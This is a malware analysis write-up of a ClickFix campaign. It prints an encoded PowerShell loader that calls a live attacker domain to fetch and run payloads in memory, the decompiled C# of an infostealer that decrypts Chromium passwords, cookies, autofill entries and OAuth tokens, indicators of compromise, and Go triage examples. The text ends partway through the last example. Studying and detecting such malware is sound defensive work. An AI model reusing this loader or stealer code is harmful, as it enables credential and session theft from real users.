Overview: The user lands on a page that reports a problem and offers a “How to Fix” button (the pattern commonly called ClickFix). Clicking the button copies an encoded PowerShell command to the clipboard and instructs the user to paste and run it. The script flushes the DNS cache to match the pretext, registers a scheduled job for persistence, polls a remote server for Base64-encoded code and executes it in memory, then wipes the clipboard and shows a decoy success message.
Infection Process:
1. User Interaction:
- Prompt to Fix Issue: The user can click a “How to Fix” button.
- Copying Malicious PowerShell Script: The button copies an encoded PowerShell script to the clipboard, instructing the user to paste and execute it in PowerShell.
2. PowerShell Execution:
- The copied command is Base64-encoded, so the user cannot see what it does, and is talked into pasting and running it.
- Once decoded, the script performs the following actions:
Script Breakdown and Analysis:
1. DNS Cache Manipulation:
ipconfig/flushdns
- Effect: Flushes the Windows DNS resolver cache. This does not redirect traffic; it supports the “DNS problem” pretext (the user sees a plausible fix run), forces a fresh lookup of the attacker’s domain, and removes cached entries that might otherwise show what was resolved.
2. Scheduled Job Creation:
Register-ScheduledJob -Name "9a95158" -ScriptBlock {
    Write-Output "Now Checking Your DNS Configuration...";   # decoy output only
}
$JobPams = @{
    Name = "9a95158"
    ScriptBlock = {
        # the name of a *.normaldaki file in the Recent folder is used as the victim id
        $GTS = [Environment]::GetFolderPath([Environment+SpecialFolder]::Recent)
        $RZS = Get-ChildItem -Path $GTS -Filter "*.normaldaki"
        $GLINA = "";
        foreach($m in $RZS) {
            $GLINA = $m.Name;
        }
        # poll the C2; $headers is not defined anywhere in the excerpt
        $g = Invoke-RestMethod -Method Get -Uri https://master.hdsjfkgsadoghdsiougds.space/lumazalupa/chapa.php?id=$GLINA -ContentType application/json -Headers $headers
        if ($g.Contains("Comm")) {
            # response format: <marker>|<Base64 PowerShell>
            $klo = $g.Split("|")[1]
            iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($klo)));
        }
    }
}
- Effect: Register-ScheduledJob creates a PowerShell scheduled job, which is a Task Scheduler task under \Microsoft\Windows\PowerShell\ScheduledJobs\ whose definition is stored under %LOCALAPPDATA%\Microsoft\Windows\PowerShell\ScheduledJobs\<name>; the task action is a powershell.exe command line that imports PSScheduledJob and calls ScheduledJobDefinition LoadFromStore/StartJobDefinition, a useful hunting pivot. The first registration under the name 9a95158 only prints a decoy “Checking Your DNS Configuration” line. The $JobPams hashtable defines the real job body: it reads the name of a *.normaldaki file in the Recent folder, sends it as the id parameter to chapa.php and, if the response contains “Comm”, Base64-decodes the text after the first “|” and runs it with iex. The job trigger, which fires every minute, and the Register-ScheduledJob @JobPams call are not reproduced in the excerpt above.
3. Environment and File Access:
$GTS = [Environment]::GetFolderPath([Environment+SpecialFolder]::Recent)
$RZS = Get-ChildItem -Path $GTS -Filter "*.normaldaki"
- Effect: The script lists the user’s Recent folder (%APPDATA%\Microsoft\Windows\Recent) for files with the .normaldaki extension and keeps the last matching file name in $GLINA. That name is then sent as the id parameter of the C2 request, so the file acts as a per-victim identifier; the excerpt does not show what creates it.
4. Remote Code Execution via HTTP Request:
$g = Invoke-RestMethod -Method Get -Uri https://master.hdsjfkgsadoghdsiougds.space/api/tu4by3gi -ContentType application/json -Headers $headers
- Effect: The job issues an HTTP GET to the remote domain and, when the response contains “Comm”, takes the text after the first “|”, Base64-decodes it and executes it in the current process:
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($klo)));
This is a standard download-and-execute pattern: the payload exists only in memory, and whatever the server returns runs with the user’s privileges every time the job fires. Note the two request paths that appear in the script (/lumazalupa/chapa.php and /api/tu4by3gi); both are listed under IoCs.
5. Clipboard and UI Manipulation:
Set-Clipboard -Value "";
[System.Windows.Forms.MessageBox]::Show("The operation was completed successfully, try refreshing the page!", "System", 0, 64);
- Effect: The script clears the clipboard, potentially removing evidence, and displays a decoy message box to give the appearance of legitimate activity.
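To triage a ClickFix clipboard stage offline, the following Go program is an added example (not code from the original page or from the attacker’s script). It decodes the Base64 command, handling both the UTF-16LE form PowerShell expects for -EncodedCommand and the UTF-8 form used with [Convert]::FromBase64String, and flags the techniques discussed above. The embedded script is a constructed imitation of the stage with c2.example.invalid as a placeholder host; the indicator patterns are this example’s own and are not a published rule set.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
	"unicode/utf8"
)

// samplePlain is a constructed imitation of the ClickFix stage (not the real
// script); the C2 host is a placeholder.
const samplePlain = `ipconfig /flushdns
Register-ScheduledJob -Name "9a95158" -ScriptBlock { Write-Output "Now Checking Your DNS Configuration..." }
$g = Invoke-RestMethod -Method Get -Uri https://c2.example.invalid/api/stage -ContentType application/json
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($g)))
Set-Clipboard -Value ""
[System.Windows.Forms.MessageBox]::Show("The operation was completed successfully, try refreshing the page!", "System", 0, 64)`

type indicator struct {
	name string
	re   *regexp.Regexp
}

// Techniques seen in the stage above; slice order fixes the report order.
var indicators = []indicator{
	{"dns-flush", regexp.MustCompile(`(?i)ipconfig\s*/flushdns`)},
	{"scheduled-job-persistence", regexp.MustCompile(`(?i)Register-ScheduledJob|New-JobTrigger|schtasks`)},
	{"remote-fetch", regexp.MustCompile(`(?i)Invoke-RestMethod|Invoke-WebRequest|DownloadString|Net\.WebClient`)},
	{"base64-iex", regexp.MustCompile(`(?i)\b(iex|Invoke-Expression)\b[\s\S]{0,120}FromBase64String|FromBase64String[\s\S]{0,120}\b(iex|Invoke-Expression)\b`)},
	{"clipboard-wipe", regexp.MustCompile(`(?i)Set-Clipboard\s+-Value\s+""`)},
	{"decoy-messagebox", regexp.MustCompile(`(?i)MessageBox\]::Show`)},
}

// DecodeStage Base64-decodes a stage. powershell -EncodedCommand expects
// UTF-16LE; a stage passed through [Convert]::FromBase64String and
// UTF8.GetString is UTF-8. ASCII text in UTF-16LE has a NUL in every odd
// byte, which is how the two forms are told apart here.
func DecodeStage(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64))
	if err != nil {
		return "", err
	}
	if len(raw) >= 2 && len(raw)%2 == 0 && raw[1] == 0 {
		u := make([]uint16, len(raw)/2)
		for i := range u {
			u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
		}
		return string(utf16.Decode(u)), nil
	}
	if !utf8.Valid(raw) {
		return "", fmt.Errorf("decoded bytes are neither UTF-16LE text nor valid UTF-8")
	}
	return string(raw), nil
}

// Triage returns the names of the indicators present in a decoded script.
func Triage(script string) []string {
	var hits []string
	for _, ind := range indicators {
		if ind.re.MatchString(script) {
			hits = append(hits, ind.name)
		}
	}
	return hits
}

// EncodeUTF16LE produces the -EncodedCommand form; it is used here only to
// build the sample, since the real clipboard content is not reproduced.
func EncodeUTF16LE(s string) string {
	u := utf16.Encode([]rune(s))
	buf := make([]byte, 2*len(u))
	for i, c := range u {
		buf[2*i] = byte(c)
		buf[2*i+1] = byte(c >> 8)
	}
	return base64.StdEncoding.EncodeToString(buf)
}

func main() {
	dec, err := DecodeStage(EncodeUTF16LE(samplePlain))
	if err != nil {
		panic(err)
	}
	fmt.Println("decoded stage:\n" + dec)
	fmt.Println("indicators:", Triage(dec))
}
```

Paste the Base64 blob from the victim’s clipboard or the `powershell -e …` command line into DecodeStage; the decoded text is what to preserve as evidence, and Triage gives a quick list of which of the behaviours above are present before any deeper analysis.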
Key Malicious Elements:
- DNS flush: clears the resolver cache, lending credibility to the “fix” and forcing a fresh lookup of the C2 domain.
- Scheduled job persistence: a PowerShell scheduled job re-runs the poller every minute.
- Victim identification: the name of a .normaldaki file in the Recent folder is sent as the id parameter to the C2.
- HTTP beaconing: every run fetches content from the C2 server.
- Base64 decoding and dynamic execution: the server’s response is decoded and passed to iex, so the second stage never has to exist on disk.
- In-memory staging: the follow-on payload served from /api/tu4by3gi is a .NET executable (see below); the loader that maps it into memory is not part of the excerpt.
- User decoy: the clipboard is wiped and a “completed successfully” message box is shown so the victim believes a legitimate fix ran.
Indicators of Compromise (IoCs):
URLs:
- hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/lumazalupa/chapa[.]php?id=$GLINA
- hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/api/tu4by3gi
- hxxps[://]onedrive[.]docx-shaed[.]com/res?a=c&b=&c=0df5e03a-ee47-435e-bcb-6870c214c93
From the final payload (see the analysis below):
- hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/mother/<random>?id=<victim id>
- hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/index2[.]php
Further investigation of the URLs from the PowerShell stage found that one of them was still live. hxxps[://]master[.]hdsjfkgsadoghdsiougds[.]space/api/tu4by3gi redirected to a second Base64-encoded payload; decoding it produced data beginning with the MZ header, i.e. a Windows PE executable.
The PE was dumped and analysed. Its hash:
SHA-256: 6cf1b3a5f0f886f05f1a87c53b83c9e385f7370c7fa058931c9ff8d2a48516c2
Technical analysis of the final payload follows. The binary is a .NET assembly; the decompiled code below keeps the metadata tokens emitted by the decompiler. Everything lives in the namespace Ishimsky, and the class and method names are obfuscated with transliterated Russian words rather than being meaningful.
The first class, BenzoPilaka (DPAPI helpers and parsing of encrypted browser values):
using System;
using System.Security.Cryptography;
using System.Text;
namespace Ishimsky
{
// Token: 0x02000006 RID: 6
public static class BenzoPilaka
{
// Token: 0x06000003 RID: 3 RVA: 0x0000209C File Offset: 0x0000029C
public static string GDC(string enc, DataProtectionScope dps, byte[] et = null)
{
return Encoding.UTF8.GetString(BenzoPilaka.DCB(Encoding.GetEncoding("windows-1251").GetBytes(enc), dps, et));
}
// Token: 0x06000004 RID: 4 RVA: 0x000020D0 File Offset: 0x000002D0
public static byte[] DCB(byte[] enc, DataProtectionScope dps, byte[] et = null)
{
byte[] result;
try
{
bool flag = enc != null && enc.Length != 0;
if (flag)
{
result = ProtectedData.Unprotect(enc, et, dps);
}
else
{
result = null;
}
}
catch (Exception)
{
result = null;
}
return result;
}
// Token: 0x06000005 RID: 5 RVA: 0x00002120 File Offset: 0x00000320
public static string BUBEL(byte[] b1, byte[] b2)
{
byte[] array = new byte[12];
Array.Copy(b1, 3, array, 0, 12);
byte[] array2 = new byte[b1.Length - 15];
Array.Copy(b1, 15, array2, 0, b1.Length - 15);
byte[] array3 = new byte[16];
Array.Copy(array2, array2.Length - 16, array3, 0, 16);
byte[] array4 = new byte[array2.Length - array3.Length];
Array.Copy(array2, 0, array4, 0, array2.Length - array3.Length);
Cloun cloun = new Cloun();
return Encoding.UTF8.GetString(cloun.DDC(b2, array, null, array4, array3));
}
}
}
ProtectedData (System.Security.Cryptography) is the .NET wrapper around DPAPI (CryptProtectData/CryptUnprotectData). With DataProtectionScope.CurrentUser, Unprotect only succeeds under the Windows account that protected the data, which is why this decryption has to run on the victim’s machine rather than on exfiltrated database files.
- DCB: DPAPI-unprotects a byte array. It returns null on empty input or on any exception, so failures are silent.
- GDC: converts the input string to bytes with the windows-1251 code page (a single-byte code page used here to carry raw bytes inside a .NET string), unprotects them with DCB and decodes the result as UTF-8. This handles the legacy Chromium format (before Chrome 80), in which each stored value was individually DPAPI-protected. No Base64 is involved.
- BUBEL: parses a modern “v10”/“v11” value: bytes 3 to 14 are the 12-byte AES-GCM nonce, and everything from byte 15 on is the ciphertext followed by the 16-byte authentication tag. It passes key (b2), nonce, no AAD, ciphertext and tag to Cloun.DDC for AES-GCM decryption.
The second class, Blizkiy (system fingerprinting):
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Management;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
using Microsoft.VisualBasic.Devices;
namespace Ishimsky
{
// Token: 0x02000007 RID: 7
internal class Blizkiy
{
// Token: 0x06000006 RID: 6 RVA: 0x000021C0 File Offset: 0x000003C0
public static string BTH(byte[] ba)
{
StringBuilder stringBuilder = new StringBuilder(ba.Length * 2);
foreach (byte b in ba)
{
stringBuilder.AppendFormat("{0:x2}", b);
}
return stringBuilder.ToString();
}
// Token: 0x06000007 RID: 7 RVA: 0x0000220C File Offset: 0x0000040C
public static byte[] ST52(string ToEncrypt)
{
MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider();
byte[] result = md5CryptoServiceProvider.ComputeHash(Encoding.UTF8.GetBytes(ToEncrypt));
md5CryptoServiceProvider.Clear();
return result;
}
// Token: 0x06000008 RID: 8 RVA: 0x00002240 File Offset: 0x00000440
public static string RMCONV(uint klobus)
{
string result;
try
{
result = ((ulong)Math.Round(klobus / 1073741824.0)).ToString();
}
catch
{
result = "0";
}
return result;
}
// Token: 0x06000009 RID: 9 RVA: 0x00002288 File Offset: 0x00000488
public static byte[] DODIK(byte[] encr, string key)
{
TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
tripleDESCryptoServiceProvider.Key = Blizkiy.ST52(key);
tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
tripleDESCryptoServiceProvider.IV = new byte[tripleDESCryptoServiceProvider.BlockSize / 8];
tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateEncryptor();
byte[] result = cryptoTransform.TransformFinalBlock(encr, 0, encr.Length);
tripleDESCryptoServiceProvider.Clear();
return result;
}
// Token: 0x0600000A RID: 10 RVA: 0x000022EC File Offset: 0x000004EC
public static List<string> MOS2(string requs, string orderito, string name)
{
string[] array = requs.Split(new char[]
{
'|'
});
List<string> list = new List<string>();
try
{
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(array[0], array[1]))
{
using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
{
foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
try
{
uint num = Convert.ToUInt32(managementObject[orderito]);
bool flag = num > 0U;
if (flag)
{
list.Add((managementObject[name] as string) + " | " + Blizkiy.RMCONV(num) + "GB");
}
else
{
list.Add(managementObject[name] as string);
}
}
catch (Exception)
{
}
}
}
}
}
catch
{
}
return list;
}
// Token: 0x0600000B RID: 11 RVA: 0x00002430 File Offset: 0x00000630
public static List<string> MOS(string requs, string orderito, string name, string comm)
{
List<string> list = new List<string>();
try
{
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(requs))
{
using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
{
foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
try
{
bool flag = !string.IsNullOrEmpty(name);
if (!flag)
{
list.Add(managementObject[orderito] as string);
return list;
}
string item = string.Concat(new string[]
{
managementObject[orderito] as string,
" | ",
comm,
" ",
Convert.ToString(managementObject[name])
});
list.Add(item);
}
catch
{
}
}
}
}
}
catch
{
}
return list;
}
// Token: 0x0600000C RID: 12 RVA: 0x00002578 File Offset: 0x00000778
public static List<string> ALV()
{
List<string> result = new List<string>();
try
{
return Enumerable.ToList<string>(Enumerable.Select<InputLanguage, string>(Enumerable.Cast<InputLanguage>(InputLanguage.InstalledInputLanguages), (InputLanguage lang) => lang.Culture.EnglishName));
}
catch
{
}
return result;
}
// Token: 0x0600000D RID: 13 RVA: 0x000025E0 File Offset: 0x000007E0
public static string RMA()
{
string result = "";
try
{
ulong totalPhysicalMemory = new ComputerInfo().TotalPhysicalMemory;
result = ((ulong)Math.Round(totalPhysicalMemory / 1073741824.0)).ToString();
}
catch
{
}
return result;
}
// Token: 0x0600000E RID: 14 RVA: 0x0000263C File Offset: 0x0000083C
public static string GWV()
{
try
{
string str;
try
{
str = (Environment.Is64BitOperatingSystem ? "x64" : "x32");
}
catch (Exception)
{
str = "x86";
}
string osfullName = new ComputerInfo().OSFullName;
bool flag = !string.IsNullOrEmpty(osfullName);
if (flag)
{
return osfullName + " " + str;
}
}
catch (Exception)
{
}
return string.Empty;
}
// Token: 0x0600000F RID: 15 RVA: 0x000026C4 File Offset: 0x000008C4
public static Size VDSZ()
{
Size size;
try
{
size = new Computer().Screen.Bounds.Size;
}
catch
{
size = new Computer().Screen.Bounds.Size;
}
return size;
}
}
}
BTH method (bytes to hex):
- Purpose: Converts a byte array into a lower-case hexadecimal string.
- Process: Formats each byte as two hex digits ("{0:x2}") and appends it to a StringBuilder.
ST52 method (string to MD5):
- Purpose: Produces the 16-byte MD5 digest of a string.
- Process: UTF-8 encodes the input (ToEncrypt) and hashes it with MD5CryptoServiceProvider. Its only visible caller is DODIK, which uses the digest as a key.
RMCONV method (RAM size conversion):
- Purpose: Converts a byte count to rounded gigabytes.
- Process: Divides the input (klobus) by 1073741824 (1 GiB), rounds, and returns the result as a string, or "0" on error. Because the parameter is a 32-bit unsigned integer it cannot represent more than 4 GiB.
DODIK method (TripleDES):
- Purpose: Encrypts a byte array (encr) with a key derived from a string (key).
- Process: Uses TripleDESCryptoServiceProvider in ECB mode with PKCS7 padding, keyed with the 16-byte MD5 of key (two-key 3DES). The IV assignment has no effect in ECB mode. ECB with a hashed string key is weak, but here it only protects the attacker’s own data; what it is applied to is not visible in this excerpt.
MOS2 method (WMI query with size formatting):
- Purpose: Queries WMI (Windows Management Instrumentation) for hardware or system information.
- Process: Splits requs on '|' into a WMI scope and a WQL query and runs it with ManagementObjectSearcher. For each object it reads the numeric property orderito; if it is greater than zero the entry becomes "<name> | <size>GB" via RMCONV, otherwise just the name. Convert.ToUInt32 throws for values above 4 GiB; the exception is swallowed and that object is skipped.
MOS method (WMI query with comment):
- Purpose: Like MOS2, but lets a caller-supplied comment (comm) be included in each entry.
- Process: Runs requs as a WQL query. If name is empty it returns only the first object’s orderito value; otherwise each entry is "<orderito> | <comm> <name>".
ALV method (installed input languages):
- Purpose: Lists the keyboard input languages installed on the system.
- Process: Maps InputLanguage.InstalledInputLanguages to the English name of each language’s culture. Stealers commonly collect this for victim profiling or to exclude particular locales; how this list is used is not shown in the excerpt.
RMA method (total RAM):
- Purpose: Returns the installed physical memory in gigabytes.
- Process: Reads ComputerInfo.TotalPhysicalMemory from Microsoft.VisualBasic.Devices and converts bytes to rounded GiB.
GWV method (Windows version):
- Purpose: Returns the OS name and whether it is 32- or 64-bit.
- Process: Returns ComputerInfo.OSFullName followed by "x64" or "x32" depending on Environment.Is64BitOperatingSystem; the "x86" branch is reached only if that property throws.
VDSZ method (display size):
- Purpose: Returns the primary screen resolution.
- Process: Reads Computer().Screen.Bounds.Size. The catch block repeats the same call, so a failure is not actually handled.
Taken together these methods build the host fingerprint (CPU, GPU, disks, RAM, OS, resolution, keyboard layouts) that is typically sent alongside stolen browser data.
The third class, Bulkonit (browser data collection):
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;
namespace Ishimsky
{
// Token: 0x02000013 RID: 19
internal class Bulkonit
{
// Token: 0x06000058 RID: 88 RVA: 0x00006C78 File Offset: 0x00004E78
public static string SpokiNoki()
{
string text = "";
string[] array = new string[]
{
"",
"E",
"A",
"D",
"F",
"C",
"X",
"Z",
"Q",
"Y"
};
Random random = new Random((int)DateTime.Now.Ticks);
Random random2 = new Random((int)DateTime.Now.Ticks);
for (int i = 0; i <= 15; i++)
{
text = text + array[random.Next(1, 8)] + random2.Next(0, 9).ToString();
}
return text;
}
// Token: 0x06000059 RID: 89 RVA: 0x00006D58 File Offset: 0x00004F58
public static string KadirovskyProspect(string ork)
{
string result;
try
{
ServicePointManager.SecurityProtocol = 3072;
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://master.hdsjfkgsadoghdsiougds.space/mother/" + Bulkonit.SpokiNoki() + "?id=" + ork);
httpWebRequest.AutomaticDecompression = 3;
string text;
using (HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse())
{
using (Stream responseStream = httpWebResponse.GetResponseStream())
{
using (StreamReader streamReader = new StreamReader(responseStream))
{
text = streamReader.ReadToEnd();
}
}
}
result = text;
}
catch
{
result = "";
}
return result;
}
// Token: 0x0600005A RID: 90 RVA: 0x00006E34 File Offset: 0x00005034
public static List<string> Chapap(string text, string key)
{
List<string> list = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(text);
ridik.ReadContextTable("logins");
for (int i = 0; i < ridik.RowLength; i++)
{
string text2 = "";
string text3 = "";
string text4 = "";
string text5 = "";
string text6 = "";
try
{
text2 = ridik.ReadContextValue(i, 0).Trim();
text3 = ridik.ReadContextValue(i, 3).Trim();
text4 = Bulkonit.Mulatka(ridik.ReadContextValue(i, 5), key);
text5 = Bulkonit.WBKT(ridik.ReadContextValue(i, 8).Trim());
text6 = Bulkonit.WBKT(ridik.ReadContextValue(i, 23).Trim());
}
catch (Exception)
{
}
finally
{
bool flag = !string.IsNullOrWhiteSpace(text2);
if (flag)
{
string item = string.Concat(new string[]
{
text2,
"|",
text3,
"|",
text4,
"|",
text5,
"|",
text6
});
list.Add(item);
}
}
}
}
catch (Exception)
{
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005B RID: 91 RVA: 0x00006FEC File Offset: 0x000051EC
public static Tuple<List<string>, List<string>> DaritMolodost(string fil, string key)
{
List<string> list = new List<string>();
List<string> list2 = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(fil);
ridik.ReadContextTable("cookies");
for (int i = 0; i < ridik.RowLength; i++)
{
string text = "";
try
{
bool flag = Convert.ToInt64(ridik.ReadContextValue(i, 7).Trim()) / 1000000L - 11644473600L < 0L;
bool flag2 = flag;
if (flag2)
{
text = string.Concat(new string[]
{
ridik.ReadContextValue(i, 1).Trim(),
"\t",
(ridik.ReadContextValue(i, 1).Trim()[0] == '.').ToString(),
"\t",
ridik.ReadContextValue(i, 6).Trim(),
"\t",
(ridik.ReadContextValue(i, 8)[0] == '1').ToString(),
"\t",
(DateTime.Now.AddMonths(12).Ticks - 621355968000000000L).ToString(),
"\t",
ridik.ReadContextValue(i, 3).Trim(),
"\t",
Bulkonit.Mulatka(ridik.ReadContextValue(i, 5), key)
});
}
else
{
text = string.Concat(new string[]
{
ridik.ReadContextValue(i, 1).Trim(),
"\t",
(ridik.ReadContextValue(i, 1).Trim()[0] == '.').ToString(),
"\t",
ridik.ReadContextValue(i, 6).Trim(),
"\t",
(ridik.ReadContextValue(i, 8)[0] == '1').ToString(),
"\t",
(Convert.ToInt64(ridik.ReadContextValue(i, 7).Trim()) / 1000000L - 11644473600L).ToString(),
"\t",
ridik.ReadContextValue(i, 3).Trim(),
"\t",
Bulkonit.Mulatka(ridik.ReadContextValue(i, 5), key)
});
}
}
catch
{
}
bool flag3 = !string.IsNullOrWhiteSpace(text);
if (flag3)
{
list.Add(text);
bool flag4 = text.Contains("google.");
if (flag4)
{
list2.Add(text);
}
else
{
bool flag5 = text.Contains("youtube.");
if (flag5)
{
list2.Add(text);
}
}
}
}
}
catch
{
}
return Tuple.Create<List<string>, List<string>>(list, list2);
}
catch (Exception)
{
}
return null;
}
// Token: 0x0600005C RID: 92 RVA: 0x00007340 File Offset: 0x00005540
public static List<string> Pidofilio(string pth, string key)
{
List<string> list = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(pth);
ridik.ReadContextTable("autofill");
int i = 0;
while (i < ridik.RowLength)
{
string text = "";
try
{
string text2 = ridik.GatherValue(i, "value").Trim();
bool flag = text2.StartsWith("v10") || text2.StartsWith("v11");
if (flag)
{
text2 = Bulkonit.Mulatka(text2, key);
}
text = ridik.GatherValue(i, "name").Trim() + "|" + text2;
}
catch
{
}
i++;
bool flag2 = !string.IsNullOrWhiteSpace(text);
if (flag2)
{
list.Add(text);
}
}
}
catch (Exception)
{
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005D RID: 93 RVA: 0x00007458 File Offset: 0x00005658
public static List<string> CaptuToto(string pth, string key)
{
List<string> list = new List<string>();
try
{
try
{
Ridik ridik = new Ridik(pth);
ridik.ReadContextTable("token_service");
int i = 0;
while (i < ridik.RowLength)
{
string text = "";
try
{
string text2 = ridik.GatherValue(i, "encrypted_token").Trim();
bool flag = text2.StartsWith("v10") || text2.StartsWith("v11");
if (flag)
{
text2 = Bulkonit.Mulatka(text2, key);
}
text = text2 + ":" + ridik.GatherValue(i, "service").Trim().Split(new char[]
{
'-'
})[1];
}
catch
{
}
i++;
bool flag2 = !string.IsNullOrWhiteSpace(text);
if (flag2)
{
list.Add(text);
}
}
}
catch (Exception)
{
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005E RID: 94 RVA: 0x00007580 File Offset: 0x00005780
public static List<string> CORMAGIDON(string profilePath)
{
List<string> list = new List<string>();
try
{
string text = Path.Combine(profilePath, "Sync Extension Settings");
bool flag = !Directory.Exists(text);
if (flag)
{
return list;
}
foreach (string text2 in ModelGeev.Blagodarnost)
{
string[] array = text2.Split(new char[]
{
'|'
});
bool flag2 = Directory.Exists(Path.Combine(text, array[0]));
if (flag2)
{
list.Add(Path.Combine(text, array[0]) + "|" + array[1]);
}
}
}
catch (Exception)
{
}
return list;
}
// Token: 0x0600005F RID: 95 RVA: 0x00007640 File Offset: 0x00005840
public static List<string> Cerulecus(string prp)
{
List<string> list = new List<string>();
try
{
string text = Path.Combine(prp, "Local Extension Settings");
bool flag = !Directory.Exists(text);
bool flag2 = flag;
if (flag2)
{
return list;
}
foreach (string text2 in ModelGeev.Blagodarnost)
{
string[] array = text2.Split(new char[]
{
'|'
});
bool flag3 = Directory.Exists(Path.Combine(text, array[0]));
if (flag3)
{
list.Add(Path.Combine(text, array[0]) + "|" + array[1]);
}
}
}
catch
{
}
return list;
}
// Token: 0x06000060 RID: 96 RVA: 0x00007704 File Offset: 0x00005904
public static string Mulatka(string chapa, string kiki)
{
string result = string.Empty;
try
{
bool flag = chapa[0] == 'v' && chapa[1] == '1';
if (flag)
{
byte[] array = Convert.FromBase64CharArray(kiki.ToCharArray(), 0, kiki.Length);
Encoding encoding = Encoding.GetEncoding("windows-1251");
byte[] array2 = new byte[array.Length - 5];
Array.Copy(array, 5, array2, 0, array.Length - 5);
byte[] b = BenzoPilaka.DCB(array2, DataProtectionScope.CurrentUser, null);
result = BenzoPilaka.BUBEL(encoding.GetBytes(chapa), b);
}
else
{
result = BenzoPilaka.GDC(chapa, DataProtectionScope.CurrentUser, null).Trim();
}
}
catch (Exception)
{
}
return result;
}
// Token: 0x06000061 RID: 97 RVA: 0x000077C0 File Offset: 0x000059C0
public static string WBKT(string WKE)
{
string result;
try
{
long num = Convert.ToInt64(WKE);
long seconds = (num - 11644473600000000L) / 1000000L;
result = DateTimeOffset.FromUnixTimeSeconds(seconds).UtcDateTime.ToString();
}
catch
{
result = "Null";
}
return result;
}
}
}
Bulkonit collects data from Chromium-based browser profiles. Ridik (not shown) reads SQLite tables by name and column; the table names match Chromium’s profile databases: logins (Login Data), cookies (Cookies), autofill and token_service (Web Data).
- SpokiNoki: builds a 32-character string by appending, sixteen times, one letter taken from indices 1 to 7 of the array (E, A, D, F, C, X or Z; Q and Y are never selected) followed by a digit from 0 to 8. It randomises the URL path of each beacon so that no two requests look alike.
- KadirovskyProspect: forces TLS 1.2 (SecurityProtocol = 3072 is SecurityProtocolType.Tls12), enables GZip and Deflate decompression (AutomaticDecompression = 3), and issues a GET to https://master.hdsjfkgsadoghdsiougds.space/mother/<random>?id=<ork>, returning the response body or an empty string on any failure.
- Chapap: iterates the logins table and emits one "origin_url|username_value|password|created|last_used"-style line per row: columns 0, 3 and 5 are origin_url, username_value and password_value (the latter decrypted with Mulatka) in Chromium’s logins table; columns 8 and 23 are WebKit timestamps converted with WBKT.
- DaritMolodost: reads the cookies table (1 host_key, 3 name, 5 encrypted_value, 6 path, 7 expires_utc, 8 is_secure) and writes each cookie as a tab-separated line in the Netscape cookies.txt layout: host, whether the host begins with '.', path, secure flag, expiry in Unix seconds, name, decrypted value. expires_utc is in WebKit microseconds; for session cookies (value 0) the conversion goes negative and the code substitutes “now plus 12 months”, but it computes that in .NET ticks (100 ns units) rather than seconds, so those lines carry an expiry about ten million times too large. Lines containing "google." or "youtube." are additionally collected in a second list.
- Pidofilio: reads the autofill table and emits "name|value", decrypting values that start with v10 or v11.
- CaptuToto: reads token_service, which holds the OAuth refresh tokens of Google accounts signed in to the browser, decrypts encrypted_token where it is v10/v11 and emits "<token>:<part of the service column after its first '-'>".
- CORMAGIDON and Cerulecus: look under the profile’s "Sync Extension Settings" and "Local Extension Settings" directories for subdirectories named by the extension IDs in ModelGeev.Blagodarnost (a hard-coded "id|label" list, not shown) and return the paths that exist, i.e. the extensions’ local storage.
- Mulatka: if the value starts with "v1" (v10/v11), it Base64-decodes the key string kiki, drops the 5-byte "DPAPI" prefix, DPAPI-unprotects the remainder to obtain the AES key and calls BUBEL; otherwise it treats the value as a legacy per-entry DPAPI blob and calls GDC. These are exactly Chromium’s two storage formats on Windows: before Chrome 80 each value was protected with CryptProtectData, since then values are AES-256-GCM under a per-profile key stored as os_crypt.encrypted_key in the Local State file.
- WBKT: converts a WebKit timestamp (microseconds since 1601-01-01) to a UTC date string via (value − 11644473600000000) / 1000000 Unix seconds, or "Null" on failure.
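WBKT and DaritMolodost both convert Chromium’s WebKit timestamps, and the latter writes cookies in a tab-separated layout. The Go program below is an added example (not the stealer’s code) that reproduces the conversion and the line format on constructed rows, so an analyst can recognise an exfiltrated cookie file and see the session-cookie quirk. The CookieRow type and the sample rows are constructed; the "True"/"False" spelling mirrors the C# bool.ToString() output the stealer produces.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// Chromium stores times as microseconds since 1601-01-01 UTC (WebKit time).
// 11644473600 seconds separate that epoch from the Unix epoch; WBKT and
// DaritMolodost both hard-code it.
const epochDeltaSeconds int64 = 11644473600

// WebKitToUnix mirrors WBKT: subtract the delta in microseconds, then use
// integer division to get Unix seconds. Values below the delta (notably 0,
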